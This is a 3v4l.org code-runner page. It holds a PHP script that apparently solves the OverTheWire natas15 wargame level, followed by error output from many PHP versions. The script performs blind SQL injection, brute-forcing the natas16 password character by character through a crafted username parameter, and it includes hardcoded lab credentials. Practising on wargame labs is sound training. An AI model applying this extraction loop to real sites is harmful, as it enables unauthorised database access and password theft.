3v4l.org

run code in 300+ PHP versions simultaneously
<?php #initialization include("LIB_http.php"); include("LIB_parse.php"); $chars=("1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"); $credentials="natas15:m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV"; $ch=curl_init(); $pass=""; $target=("natas15.natas.labs.overthewire.org/index.php"); $needle="r e"; for($xx=1;$xx<33;$xx++) for($yy=0;$yy<62;$yy++) { $char=substr($chars,$yy,1); $target2=$target."?username=natas16\" and SUBSTRING(password,$xx,1) LIKE BINARY \"".$char; echo "\n".$target2."\n"; curl_setopt($ch, CURLOPT_URL, $target2); curl_setopt($ch, CURLOPT_USERPWD, $credentials); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $page=curl_exec($ch); echo "\n".strlen($page); if(strlen($page)<288) { $pass=$pass.$char; echo "\n\n\n\n\n\n\n\n\n\n\n\n\nLa pass per ora e': ".$pass."\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; $yy=62; } } echo "\nLa password e': ".$pass; ?>
Output for 8.0.0 - 8.0.12, 8.0.14 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.6
Warning: include(): open_basedir restriction in effect. File(LIB_http.php) is not within the allowed path(s): (/tmp:/in:/etc) in /in/hjqT0 on line 4 Warning: include(LIB_http.php): Failed to open stream: Operation not permitted in /in/hjqT0 on line 4 Warning: include(): Failed opening 'LIB_http.php' for inclusion (include_path='.:') in /in/hjqT0 on line 4 Warning: include(): open_basedir restriction in effect. File(LIB_parse.php) is not within the allowed path(s): (/tmp:/in:/etc) in /in/hjqT0 on line 6 Warning: include(LIB_parse.php): Failed to open stream: Operation not permitted in /in/hjqT0 on line 6 Warning: include(): Failed opening 'LIB_parse.php' for inclusion (include_path='.:') in /in/hjqT0 on line 6 Fatal error: Uncaught Error: Call to undefined function curl_init() in /in/hjqT0:10 Stack trace: #0 {main} thrown in /in/hjqT0 on line 10
Process exited with code 255.
Output for 8.0.13
Warning: include(LIB_http.php): Failed to open stream: No such file or directory in /in/hjqT0 on line 4 Warning: include(): Failed opening 'LIB_http.php' for inclusion (include_path='.:') in /in/hjqT0 on line 4 Warning: include(LIB_parse.php): Failed to open stream: No such file or directory in /in/hjqT0 on line 6 Warning: include(): Failed opening 'LIB_parse.php' for inclusion (include_path='.:') in /in/hjqT0 on line 6 Fatal error: Uncaught Error: Call to undefined function curl_init() in /in/hjqT0:10 Stack trace: #0 {main} thrown in /in/hjqT0 on line 10
Process exited with code 255.
Output for 7.0.0 - 7.0.20, 7.1.0 - 7.1.10, 7.3.32 - 7.3.33, 7.4.33
Warning: include(LIB_http.php): failed to open stream: No such file or directory in /in/hjqT0 on line 4 Warning: include(): Failed opening 'LIB_http.php' for inclusion (include_path='.:') in /in/hjqT0 on line 4 Warning: include(LIB_parse.php): failed to open stream: No such file or directory in /in/hjqT0 on line 6 Warning: include(): Failed opening 'LIB_parse.php' for inclusion (include_path='.:') in /in/hjqT0 on line 6 Fatal error: Uncaught Error: Call to undefined function curl_init() in /in/hjqT0:10 Stack trace: #0 {main} thrown in /in/hjqT0 on line 10
Process exited with code 255.
Output for 7.1.25 - 7.1.33, 7.2.0 - 7.2.33, 7.3.0 - 7.3.31, 7.4.0 - 7.4.32
Warning: include(): open_basedir restriction in effect. File(LIB_http.php) is not within the allowed path(s): (/tmp:/in:/etc) in /in/hjqT0 on line 4 Warning: include(LIB_http.php): failed to open stream: Operation not permitted in /in/hjqT0 on line 4 Warning: include(): Failed opening 'LIB_http.php' for inclusion (include_path='.:') in /in/hjqT0 on line 4 Warning: include(): open_basedir restriction in effect. File(LIB_parse.php) is not within the allowed path(s): (/tmp:/in:/etc) in /in/hjqT0 on line 6 Warning: include(LIB_parse.php): failed to open stream: Operation not permitted in /in/hjqT0 on line 6 Warning: include(): Failed opening 'LIB_parse.php' for inclusion (include_path='.:') in /in/hjqT0 on line 6 Fatal error: Uncaught Error: Call to undefined function curl_init() in /in/hjqT0:10 Stack trace: #0 {main} thrown in /in/hjqT0 on line 10
Process exited with code 255.
Output for 7.1.20
Warning: include(): open_basedir restriction in effect. File(LIB_http.php) is not within the allowed path(s): (/tmp:/in) in /in/hjqT0 on line 4 Warning: include(LIB_http.php): failed to open stream: Operation not permitted in /in/hjqT0 on line 4 Warning: include(): Failed opening 'LIB_http.php' for inclusion (include_path='.:') in /in/hjqT0 on line 4 Warning: include(): open_basedir restriction in effect. File(LIB_parse.php) is not within the allowed path(s): (/tmp:/in) in /in/hjqT0 on line 6 Warning: include(LIB_parse.php): failed to open stream: Operation not permitted in /in/hjqT0 on line 6 Warning: include(): Failed opening 'LIB_parse.php' for inclusion (include_path='.:') in /in/hjqT0 on line 6 Fatal error: Uncaught Error: Call to undefined function curl_init() in /in/hjqT0:10 Stack trace: #0 {main} thrown in /in/hjqT0 on line 10
Process exited with code 255.
Output for 5.1.0 - 5.1.6, 5.2.0 - 5.2.17, 5.3.0 - 5.3.29, 5.4.0 - 5.4.45, 5.5.0 - 5.5.35, 5.6.0 - 5.6.28
Warning: include(LIB_http.php): failed to open stream: No such file or directory in /in/hjqT0 on line 4 Warning: include(): Failed opening 'LIB_http.php' for inclusion (include_path='.:') in /in/hjqT0 on line 4 Warning: include(LIB_parse.php): failed to open stream: No such file or directory in /in/hjqT0 on line 6 Warning: include(): Failed opening 'LIB_parse.php' for inclusion (include_path='.:') in /in/hjqT0 on line 6 Fatal error: Call to undefined function curl_init() in /in/hjqT0 on line 10
Process exited with code 255.
Output for 5.0.0 - 5.0.5
Warning: main(LIB_http.php): failed to open stream: No such file or directory in /in/hjqT0 on line 4 Warning: main(): Failed opening 'LIB_http.php' for inclusion (include_path='.:') in /in/hjqT0 on line 4 Warning: main(LIB_parse.php): failed to open stream: No such file or directory in /in/hjqT0 on line 6 Warning: main(): Failed opening 'LIB_parse.php' for inclusion (include_path='.:') in /in/hjqT0 on line 6 Fatal error: Call to undefined function curl_init() in /in/hjqT0 on line 10
Process exited with code 255.
Output for 4.4.5 - 4.4.9
Warning: main(LIB_http.php): failed to open stream: No such file or directory in /in/hjqT0 on line 4 Warning: main(): Failed opening 'LIB_http.php' for inclusion (include_path='.:') in /in/hjqT0 on line 4 Warning: main(LIB_parse.php): failed to open stream: No such file or directory in /in/hjqT0 on line 6 Warning: main(): Failed opening 'LIB_parse.php' for inclusion (include_path='.:') in /in/hjqT0 on line 6 Fatal error: Call to undefined function: curl_init() in /in/hjqT0 on line 10
Process exited with code 255.
Output for 4.3.2 - 4.3.11, 4.4.0 - 4.4.4
Warning: main(LIB_http.php): failed to open stream: No such file or directory in /in/hjqT0 on line 4 Warning: main(): Failed opening 'LIB_http.php' for inclusion (include_path='.:') in /in/hjqT0 on line 4 Warning: main(LIB_parse.php): failed to open stream: No such file or directory in /in/hjqT0 on line 6 Warning: main(): Failed opening 'LIB_parse.php' for inclusion (include_path='.:') in /in/hjqT0 on line 6 Fatal error: Call to undefined function: curl_init() in /in/hjqT0 on line 10
Process exited with code 255.
Output for 4.3.0 - 4.3.1
Warning: main(LIB_http.php) [http://www.php.net/function.main]: failed to create stream: No such file or directory in /in/hjqT0 on line 4 Warning: main() [http://www.php.net/function.main]: Failed opening 'LIB_http.php' for inclusion (include_path='.:') in /in/hjqT0 on line 4 Warning: main(LIB_parse.php) [http://www.php.net/function.main]: failed to create stream: No such file or directory in /in/hjqT0 on line 6 Warning: main() [http://www.php.net/function.main]: Failed opening 'LIB_parse.php' for inclusion (include_path='.:') in /in/hjqT0 on line 6 Fatal error: Call to undefined function: curl_init() in /in/hjqT0 on line 10

preferences:
260.22 ms | 403 KiB | 389 Q